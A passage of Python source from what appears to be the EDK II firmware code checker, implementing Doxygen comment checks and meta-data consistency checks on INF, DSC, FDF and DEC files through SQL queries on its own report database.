'INF/DEC/DSC/FDF file header comment should begin with \"\"## @file\"\" or \"\"# @file\"\"at the very top file'\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_DOXYGEN_CHECK_FILE_HEADER, Msg, \"File\", Result[0])\r\n\r\n else:\r\n CurrentSection = MODEL_IDENTIFIER_FILE_HEADER\r\n #\r\n # Append the first line to section lines.\r\n #\r\n HeaderSectionLines.append((Line, LineNo))\r\n HeaderCommentStart = True\r\n continue\r\n\r\n #\r\n # Collect Header content.\r\n #\r\n if (Line.startswith('#') and CurrentSection == MODEL_IDENTIFIER_FILE_HEADER) and\\\r\n HeaderCommentStart and not Line.startswith('##') and not\\\r\n HeaderCommentEnd and NextLine != '':\r\n HeaderSectionLines.append((Line, LineNo))\r\n continue\r\n #\r\n # Header content end\r\n #\r\n if (Line.startswith('##') or not Line.strip().startswith(\"#\")) and HeaderCommentStart \\\r\n and not HeaderCommentEnd:\r\n if Line.startswith('##'):\r\n HeaderCommentEnd = True\r\n HeaderSectionLines.append((Line, LineNo))\r\n ParseHeaderCommentSection(HeaderSectionLines, FullName)\r\n break\r\n if HeaderCommentStart == False:\r\n SqlStatement = \"\"\" select ID from File where FullPath like '%s'\"\"\" % FullName\r\n ResultSet = EccGlobalData.gDb.TblFile.Exec(SqlStatement)\r\n for Result in ResultSet:\r\n Msg = 'INF/DEC/DSC/FDF file header comment should begin with \"\"## @file\"\" or \"\"# @file\"\" at the very top file'\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_DOXYGEN_CHECK_FILE_HEADER, Msg, \"File\", Result[0])\r\n if HeaderCommentEnd == False:\r\n SqlStatement = \"\"\" select ID from File where FullPath like '%s'\"\"\" % FullName\r\n ResultSet = EccGlobalData.gDb.TblFile.Exec(SqlStatement)\r\n for Result in ResultSet:\r\n Msg = 'INF/DEC/DSC/FDF file header comment should end with \"\"##\"\" at the end of file header comment block'\r\n # Check whether File header Comment End with '##'\r\n if EccGlobalData.gConfig.HeaderCheckFileCommentEnd == '1' or EccGlobalData.gConfig.HeaderCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_DOXYGEN_CHECK_FILE_HEADER, Msg, \"File\", Result[0])\r\n\r\n\r\n\r\n # Check whether the function headers are followed Doxygen special documentation blocks in section 2.3.5\r\n def DoxygenCheckFunctionHeader(self):\r\n if EccGlobalData.gConfig.DoxygenCheckFunctionHeader == '1' or EccGlobalData.gConfig.DoxygenCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Doxygen function header ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# MsgList = c.CheckFuncHeaderDoxygenComments(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n MsgList = c.CheckFuncHeaderDoxygenComments(FullName)\r\n\r\n\r\n # Check whether the first line of text in a comment block is a brief description of the element being documented.\r\n # The brief description must end with a period.\r\n def DoxygenCheckCommentDescription(self):\r\n if EccGlobalData.gConfig.DoxygenCheckCommentDescription == '1' or EccGlobalData.gConfig.DoxygenCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n pass\r\n\r\n # Check whether comment lines with '///< ... text ...' format, if it is used, it should be after the code section.\r\n def DoxygenCheckCommentFormat(self):\r\n if EccGlobalData.gConfig.DoxygenCheckCommentFormat == '1' or EccGlobalData.gConfig.DoxygenCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Doxygen comment ///< ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# MsgList = c.CheckDoxygenTripleForwardSlash(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n MsgList = c.CheckDoxygenTripleForwardSlash(FullName)\r\n\r\n # Check whether only Doxygen commands allowed to mark the code are @bug and @todo.\r\n def DoxygenCheckCommand(self):\r\n if EccGlobalData.gConfig.DoxygenCheckCommand == '1' or EccGlobalData.gConfig.DoxygenCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Doxygen command ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# MsgList = c.CheckDoxygenCommand(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n MsgList = c.CheckDoxygenCommand(FullName)\r\n\r\n # Meta-Data File Processing Checking\r\n def MetaDataFileCheck(self):\r\n self.MetaDataFileCheckPathName()\r\n self.MetaDataFileCheckGenerateFileList()\r\n self.MetaDataFileCheckLibraryInstance()\r\n self.MetaDataFileCheckLibraryInstanceDependent()\r\n self.MetaDataFileCheckLibraryInstanceOrder()\r\n self.MetaDataFileCheckLibraryNoUse()\r\n self.MetaDataFileCheckLibraryDefinedInDec()\r\n self.MetaDataFileCheckBinaryInfInFdf()\r\n self.MetaDataFileCheckPcdDuplicate()\r\n self.MetaDataFileCheckPcdFlash()\r\n self.MetaDataFileCheckPcdNoUse()\r\n self.MetaDataFileCheckGuidDuplicate()\r\n self.MetaDataFileCheckModuleFileNoUse()\r\n self.MetaDataFileCheckPcdType()\r\n self.MetaDataFileCheckModuleFileGuidDuplication()\r\n self.MetaDataFileCheckModuleFileGuidFormat()\r\n self.MetaDataFileCheckModuleFileProtocolFormat()\r\n self.MetaDataFileCheckModuleFilePpiFormat()\r\n self.MetaDataFileCheckModuleFilePcdFormat()\r\n\r\n # Check whether each file defined in meta-data exists\r\n def MetaDataFileCheckPathName(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckPathName == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n # This item is covered when parsing Inf/Dec/Dsc files\r\n pass\r\n\r\n # Generate a list for all files defined in meta-data files\r\n def MetaDataFileCheckGenerateFileList(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckGenerateFileList == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n # This item is covered when parsing Inf/Dec/Dsc files\r\n pass\r\n\r\n # Check whether all Library Instances defined for a given module (or dependent library instance) match the module's type.\r\n # Each Library Instance must specify the Supported Module Types in its Inf file,\r\n # and any module specifying the library instance must be one of the supported types.\r\n def MetaDataFileCheckLibraryInstance(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckLibraryInstance == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for library instance type issue ...\")\r\n SqlCommand = \"\"\"select A.ID, A.Value3, B.Value3 from Inf as A left join Inf as B\r\n where A.Value2 = 'LIBRARY_CLASS' and A.Model = %s\r\n and B.Value2 = 'MODULE_TYPE' and B.Model = %s and A.BelongsToFile = B.BelongsToFile\r\n group by A.BelongsToFile\"\"\" % (MODEL_META_DATA_HEADER, MODEL_META_DATA_HEADER)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n LibraryClasses = {}\r\n for Record in RecordSet:\r\n List = Record[1].split('|', 1)\r\n SupModType = []\r\n if len(List) == 1:\r\n SupModType = DT.SUP_MODULE_LIST_STRING.split(DT.TAB_VALUE_SPLIT)\r\n elif len(List) == 2:\r\n SupModType = List[1].split()\r\n\r\n if List[0] not in LibraryClasses:\r\n LibraryClasses[List[0]] = SupModType\r\n else:\r\n for Item in SupModType:\r\n if Item not in LibraryClasses[List[0]]:\r\n LibraryClasses[List[0]].append(Item)\r\n\r\n if Record[2] != DT.SUP_MODULE_BASE and Record[2] not in SupModType:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_2, OtherMsg=\"The Library Class '%s' does not specify its supported module types\" % (List[0]), BelongsToTable='Inf', BelongsToItem=Record[0])\r\n\r\n SqlCommand = \"\"\"select A.ID, A.Value1, B.Value3 from Inf as A left join Inf as B\r\n where A.Model = %s and B.Value2 = '%s' and B.Model = %s\r\n and B.BelongsToFile = A.BelongsToFile\"\"\" \\\r\n % (MODEL_EFI_LIBRARY_CLASS, 'MODULE_TYPE', MODEL_META_DATA_HEADER)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n # Merge all LibraryClasses' supmodlist\r\n RecordDict = {}\r\n for Record in RecordSet:\r\n if Record[1] not in RecordDict:\r\n RecordDict[Record[1]] = [str(Record[2])]\r\n else:\r\n if Record[2] not in RecordDict[Record[1]]:\r\n RecordDict[Record[1]].append(Record[2])\r\n\r\n for Record in RecordSet:\r\n if Record[1] in LibraryClasses:\r\n if Record[2] not in LibraryClasses[Record[1]] and DT.SUP_MODULE_BASE not in RecordDict[Record[1]]:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_1, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_1, OtherMsg=\"The type of Library Class [%s] defined in Inf file does not match the type of the module\" % (Record[1]), BelongsToTable='Inf', BelongsToItem=Record[0])\r\n else:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_1, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_1, OtherMsg=\"The type of Library Class [%s] defined in Inf file does not match the type of the module\" % (Record[1]), BelongsToTable='Inf', BelongsToItem=Record[0])\r\n\r\n # Check whether a Library Instance has been defined for all dependent library classes\r\n def MetaDataFileCheckLibraryInstanceDependent(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckLibraryInstanceDependent == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for library instance dependent issue ...\")\r\n SqlCommand = \"\"\"select ID, Value1, Value2 from Dsc where Model = %s\"\"\" % MODEL_EFI_LIBRARY_CLASS\r\n LibraryClasses = EccGlobalData.gDb.TblDsc.Exec(SqlCommand)\r\n for LibraryClass in LibraryClasses:\r\n if LibraryClass[1].upper() == 'NULL' or LibraryClass[1].startswith('!ifdef') or LibraryClass[1].startswith('!ifndef') or LibraryClass[1].endswith('!endif'):\r\n continue\r\n else:\r\n LibraryIns = os.path.normpath(mws.join(EccGlobalData.gWorkspace, LibraryClass[2]))\r\n SkipDirString = '|'.join(EccGlobalData.gConfig.SkipDirList)\r\n p = re.compile(r'.*[\\\\/](?:%s^\\S)[\\\\/]?.*' % SkipDirString)\r\n if p.match(os.path.split(LibraryIns)[0].upper()):\r\n continue\r\n SqlCommand = \"\"\"select Value3 from Inf where BelongsToFile =\r\n (select ID from File where lower(FullPath) = lower('%s'))\r\n and Value2 = '%s'\"\"\" % (LibraryIns, DT.PLATFORM_COMPONENT_TYPE_LIBRARY_CLASS)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n IsFound = False\r\n for Record in RecordSet:\r\n LibName = Record[0].split('|', 1)[0]\r\n if LibraryClass[1] == LibName:\r\n IsFound = True\r\n if not IsFound:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_DEPENDENT, LibraryClass[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_INSTANCE_DEPENDENT, OtherMsg=\"The Library Class [%s] is not specified in '%s'\" % (LibraryClass[1], LibraryClass[2]), BelongsToTable='Dsc', BelongsToItem=LibraryClass[0])\r\n\r\n # Check whether the Library Instances specified by the LibraryClasses sections are listed in order of dependencies\r\n def MetaDataFileCheckLibraryInstanceOrder(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckLibraryInstanceOrder == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n # This checkpoint is not necessary for Ecc check\r\n pass\r\n\r\n # Check whether the unnecessary inclusion of library classes in the Inf file\r\n # Check whether the unnecessary duplication of library classe names in the DSC file\r\n def MetaDataFileCheckLibraryNoUse(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckLibraryNoUse == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for library instance not used ...\")\r\n SqlCommand = \"\"\"select ID, Value1 from Inf as A where A.Model = %s and A.Value1 not in (select B.Value1 from Dsc as B where Model = %s)\"\"\" % (MODEL_EFI_LIBRARY_CLASS, MODEL_EFI_LIBRARY_CLASS)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_NO_USE, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_NO_USE, OtherMsg=\"The Library Class [%s] is not used in any platform\" % (Record[1]), BelongsToTable='Inf', BelongsToItem=Record[0])\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value1, A.BelongsToFile, A.StartLine, B.StartLine from Dsc as A left join Dsc as B\r\n where A.Model = %s and B.Model = %s and A.Scope1 = B.Scope1 and A.Scope2 = B.Scope2 and A.ID != B.ID\r\n and A.Value1 = B.Value1 and A.Value2 != B.Value2 and A.BelongsToItem = -1 and B.BelongsToItem = -1 and A.StartLine != B.StartLine and B.BelongsToFile = A.BelongsToFile\"\"\" \\\r\n % (MODEL_EFI_LIBRARY_CLASS, MODEL_EFI_LIBRARY_CLASS)\r\n RecordSet = EccGlobalData.gDb.TblDsc.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[3] and Record[4] and Record[3] != Record[4] and Record[1] != 'NULL':\r\n SqlCommand = \"\"\"select FullPath from File where ID = %s\"\"\" % (Record[2])\r\n FilePathList = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for FilePath in FilePathList:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_NAME_DUPLICATE, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_NAME_DUPLICATE, OtherMsg=\"The Library Class [%s] is duplicated in '%s' line %s and line %s.\" % (Record[1], FilePath, Record[3], Record[4]), BelongsToTable='Dsc', BelongsToItem=Record[0])\r\n\r\n # Check the header file in Include\\Library directory whether be defined in the package DEC file.\r\n def MetaDataFileCheckLibraryDefinedInDec(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckLibraryDefinedInDec == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for library instance whether be defined in the package dec file ...\")\r\n SqlCommand = \"\"\"\r\n select A.Value1, A.StartLine, A.ID, B.Value1 from Inf as A left join Dec as B\r\n on A.Model = B.Model and A.Value1 = B.Value1 where A.Model=%s\r\n \"\"\" % MODEL_EFI_LIBRARY_CLASS\r\n RecordSet = EccGlobalData.gDb.TblDsc.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n LibraryInInf, Line, ID, LibraryDec = Record\r\n if not LibraryDec:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_LIBRARY_NOT_DEFINED, LibraryInInf):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_LIBRARY_NOT_DEFINED, \\\r\n OtherMsg=\"The Library Class [%s] in %s line is not defined in the associated package file.\" % (LibraryInInf, Line),\r\n BelongsToTable='Inf', BelongsToItem=ID)\r\n\r\n # Check whether an Inf file is specified in the FDF file, but not in the Dsc file, then the Inf file must be for a Binary module only\r\n def MetaDataFileCheckBinaryInfInFdf(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckBinaryInfInFdf == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for non-binary modules defined in FDF files ...\")\r\n SqlCommand = \"\"\"select A.ID, A.Value1 from Fdf as A\r\n where A.Model = %s\r\n and A.Enabled > -1\r\n and A.Value1 not in\r\n (select B.Value1 from Dsc as B\r\n where B.Model = %s\r\n and B.Enabled > -1)\"\"\" % (MODEL_META_DATA_COMPONENT, MODEL_META_DATA_COMPONENT)\r\n RecordSet = EccGlobalData.gDb.TblFdf.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n FdfID = Record[0]\r\n FilePath = Record[1]\r\n FilePath = os.path.normpath(mws.join(EccGlobalData.gWorkspace, FilePath))\r\n SqlCommand = \"\"\"select ID from Inf where Model = %s and BelongsToFile = (select ID from File where FullPath like '%s')\r\n \"\"\" % (MODEL_EFI_SOURCE_FILE, FilePath)\r\n NewRecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n if NewRecordSet != []:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_BINARY_INF_IN_FDF, FilePath):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_BINARY_INF_IN_FDF, OtherMsg=\"File [%s] defined in FDF file and not in DSC file must be a binary module\" % (FilePath), BelongsToTable='Fdf', BelongsToItem=FdfID)\r\n\r\n # Check whether a PCD is set in a Dsc file or the FDF file, but not in both.\r\n def MetaDataFileCheckPcdDuplicate(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckPcdDuplicate == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for duplicate PCDs defined in both DSC and FDF files ...\")\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value1, A.Value2, A.BelongsToFile, B.ID, B.Value1, B.Value2, B.BelongsToFile from Dsc as A, Fdf as B\r\n where A.Model >= %s and A.Model < %s\r\n and B.Model >= %s and B.Model < %s\r\n and A.Value1 = B.Value1\r\n and A.Value2 = B.Value2\r\n and A.Enabled > -1\r\n and B.Enabled > -1\r\n group by A.ID\r\n \"\"\" % (MODEL_PCD, MODEL_META_DATA_HEADER, MODEL_PCD, MODEL_META_DATA_HEADER)\r\n RecordSet = EccGlobalData.gDb.TblDsc.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n SqlCommand1 = \"\"\"select Name from File where ID = %s\"\"\" % Record[3]\r\n SqlCommand2 = \"\"\"select Name from File where ID = %s\"\"\" % Record[7]\r\n DscFileName = os.path.splitext(EccGlobalData.gDb.TblDsc.Exec(SqlCommand1)[0][0])[0]\r\n FdfFileName = os.path.splitext(EccGlobalData.gDb.TblDsc.Exec(SqlCommand2)[0][0])[0]\r\n if DscFileName != FdfFileName:\r\n continue\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, Record[1] + '.' + Record[2]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, OtherMsg=\"The PCD [%s] is defined in both FDF file and DSC file\" % (Record[1] + '.' + Record[2]), BelongsToTable='Dsc', BelongsToItem=Record[0])\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, Record[5] + '.' + Record[6]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, OtherMsg=\"The PCD [%s] is defined in both FDF file and DSC file\" % (Record[5] + '.' + Record[6]), BelongsToTable='Fdf', BelongsToItem=Record[4])\r\n\r\n EdkLogger.quiet(\"Checking for duplicate PCDs defined in DEC files ...\")\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value1, A.Value2, A.Model, B.Model from Dec as A left join Dec as B\r\n where A.Model >= %s and A.Model < %s\r\n and B.Model >= %s and B.Model < %s\r\n and A.Value1 = B.Value1\r\n and A.Value2 = B.Value2\r\n and A.Scope1 = B.Scope1\r\n and A.ID != B.ID\r\n and A.Model = B.Model\r\n and A.Enabled > -1\r\n and B.Enabled > -1\r\n and A.BelongsToFile = B.BelongsToFile\r\n group by A.ID\r\n \"\"\" % (MODEL_PCD, MODEL_META_DATA_HEADER, MODEL_PCD, MODEL_META_DATA_HEADER)\r\n RecordSet = EccGlobalData.gDb.TblDec.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n RecordCat = Record[1] + '.' + Record[2]\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, RecordCat):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_DUPLICATE, OtherMsg=\"The PCD [%s] is defined duplicated in DEC file\" % RecordCat, BelongsToTable='Dec', BelongsToItem=Record[0])\r\n\r\n # Check whether PCD settings in the FDF file can only be related to flash.\r\n def MetaDataFileCheckPcdFlash(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckPcdFlash == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking only Flash related PCDs are used in FDF ...\")\r\n SqlCommand = \"\"\"\r\n select ID, Value1, Value2, BelongsToFile from Fdf as A\r\n where A.Model >= %s and Model < %s\r\n and A.Enabled > -1\r\n and A.Value2 not like '%%Flash%%'\r\n \"\"\" % (MODEL_PCD, MODEL_META_DATA_HEADER)\r\n RecordSet = EccGlobalData.gDb.TblFdf.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_FLASH, Record[1] + '.' + Record[2]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_FLASH, OtherMsg=\"The PCD [%s] defined in FDF file is not related to Flash\" % (Record[1] + '.' + Record[2]), BelongsToTable='Fdf', BelongsToItem=Record[0])\r\n\r\n # Check whether PCDs used in Inf files but not specified in Dsc or FDF files\r\n def MetaDataFileCheckPcdNoUse(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckPcdNoUse == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for non-specified PCDs ...\")\r\n SqlCommand = \"\"\"\r\n select ID, Value1, Value2, BelongsToFile from Inf as A\r\n where A.Model >= %s and Model < %s\r\n and A.Enabled > -1\r\n and (A.Value1, A.Value2) not in\r\n (select Value1, Value2 from Dsc as B\r\n where B.Model >= %s and B.Model < %s\r\n and B.Enabled > -1)\r\n and (A.Value1, A.Value2) not in\r\n (select Value1, Value2 from Fdf as C\r\n where C.Model >= %s and C.Model < %s\r\n and C.Enabled > -1)\r\n \"\"\" % (MODEL_PCD, MODEL_META_DATA_HEADER, MODEL_PCD, MODEL_META_DATA_HEADER, MODEL_PCD, MODEL_META_DATA_HEADER)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_NO_USE, Record[1] + '.' + Record[2]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_NO_USE, OtherMsg=\"The PCD [%s] defined in INF file is not specified in either DSC or FDF files\" % (Record[1] + '.' + Record[2]), BelongsToTable='Inf', BelongsToItem=Record[0])\r\n\r\n # Check whether having duplicate guids defined for Guid/Protocol/Ppi\r\n def MetaDataFileCheckGuidDuplicate(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckGuidDuplicate == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for duplicate GUID/PPI/PROTOCOL ...\")\r\n # Check Guid\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_GUID, MODEL_EFI_GUID, EccGlobalData.gDb.TblDec)\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_GUID, MODEL_EFI_GUID, EccGlobalData.gDb.TblDsc)\r\n self.CheckGuidProtocolPpiValue(ERROR_META_DATA_FILE_CHECK_DUPLICATE_GUID, MODEL_EFI_GUID)\r\n # Check protocol\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PROTOCOL, MODEL_EFI_PROTOCOL, EccGlobalData.gDb.TblDec)\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PROTOCOL, MODEL_EFI_PROTOCOL, EccGlobalData.gDb.TblDsc)\r\n self.CheckGuidProtocolPpiValue(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PROTOCOL, MODEL_EFI_PROTOCOL)\r\n # Check ppi\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PPI, MODEL_EFI_PPI, EccGlobalData.gDb.TblDec)\r\n self.CheckGuidProtocolPpi(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PPI, MODEL_EFI_PPI, EccGlobalData.gDb.TblDsc)\r\n self.CheckGuidProtocolPpiValue(ERROR_META_DATA_FILE_CHECK_DUPLICATE_PPI, MODEL_EFI_PPI)\r\n\r\n # Check whether all files under module directory are described in INF files\r\n def MetaDataFileCheckModuleFileNoUse(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFileNoUse == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for no used module files ...\")\r\n SqlCommand = \"\"\"\r\n select upper(Path) from File where ID in (select BelongsToFile from Inf where BelongsToFile != -1)\r\n \"\"\"\r\n InfPathSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n InfPathList = []\r\n for Item in InfPathSet:\r\n if Item[0] not in InfPathList:\r\n InfPathList.append(Item[0])\r\n SqlCommand = \"\"\"\r\n select ID, Path, FullPath from File where upper(FullPath) not in\r\n (select upper(A.Path) || '%s' || upper(B.Value1) from File as A, INF as B\r\n where A.ID in (select BelongsToFile from INF where Model = %s group by BelongsToFile) and\r\n B.BelongsToFile = A.ID and B.Model = %s)\r\n and (Model = %s or Model = %s)\r\n \"\"\" % (os.sep, MODEL_EFI_SOURCE_FILE, MODEL_EFI_SOURCE_FILE, MODEL_FILE_C, MODEL_FILE_H)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Path = Record[1]\r\n Path = Path.upper().replace('\\X64', '').replace('\\IA32', '').replace('\\EBC', '').replace('\\IPF', '').replace('\\ARM', '')\r\n if Path in InfPathList:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_MODULE_FILE_NO_USE, Record[2]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_MODULE_FILE_NO_USE, OtherMsg=\"The source file [%s] is existing in module directory but it is not described in INF file.\" % (Record[2]), BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # Check whether the PCD is correctly used in C function via its type\r\n def MetaDataFileCheckPcdType(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckPcdType == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for pcd type in c code function usage ...\")\r\n SqlCommand = \"\"\"\r\n select ID, Model, Value1, Value2, BelongsToFile from INF where Model > %s and Model < %s\r\n \"\"\" % (MODEL_PCD, MODEL_META_DATA_HEADER)\r\n PcdSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n for Pcd in PcdSet:\r\n Model = Pcd[1]\r\n PcdName = Pcd[2]\r\n if Pcd[3]:\r\n PcdName = Pcd[3]\r\n BelongsToFile = Pcd[4]\r\n SqlCommand = \"\"\"\r\n select ID from File where FullPath in\r\n (select B.Path || '%s' || A.Value1 from INF as A, File as B where A.Model = %s and A.BelongsToFile = %s\r\n and B.ID = %s and (B.Model = %s or B.Model = %s))\r\n \"\"\" % (os.sep, MODEL_EFI_SOURCE_FILE, BelongsToFile, BelongsToFile, MODEL_FILE_C, MODEL_FILE_H)\r\n TableSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Tbl in TableSet:\r\n TblName = 'Identifier' + str(Tbl[0])\r\n SqlCommand = \"\"\"\r\n select Name, ID from %s where value like '%s' and Model = %s\r\n \"\"\" % (TblName, PcdName, MODEL_IDENTIFIER_FUNCTION_CALLING)\r\n RecordSet = EccGlobalData.gDb.TblInf.Exec(SqlCommand)\r\n TblNumber = TblName.replace('Identifier', '')\r\n for Record in RecordSet:\r\n FunName = Record[0]\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_PCD_TYPE, FunName):\r\n if Model in [MODEL_PCD_FIXED_AT_BUILD] and not FunName.startswith('FixedPcdGet'):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_TYPE, OtherMsg=\"The pcd 